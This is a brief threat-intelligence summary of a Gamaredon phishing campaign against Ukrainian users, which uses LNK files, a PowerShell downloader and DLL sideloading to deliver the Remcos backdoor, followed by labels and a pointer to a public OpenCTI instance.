Gamaredon campaign abuses LNK files to distribute Remcos backdoor

SUMMARY :

A campaign targeting users in Ukraine with malicious LNK files has been observed since November 2024. The files, using Russian words related to troop movements as lures, run a PowerShell downloader contacting geo-fenced servers in Russia and Germany. The second stage payload uses DLL side loading to execute the Remcos backdoor. The activity is attributed to the Gamaredon threat actor group with medium confidence. The campaign uses the invasion of Ukraine as a theme in phishing attempts, distributing LNK files disguised as Office documents. The servers used are mostly hosted by GTHost and HyperHosting ISPs. The attack chain involves DLL sideloading to load the Remcos backdoor, which communicates with a C2 server on a specific port.

OPENCTI LABELS :

powershell,phishing,ukraine,remcos,lnk files,dll sideloading,gthost,hyperhosting


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Gamaredon campaign abuses LNK files to distribute Remcos backdoor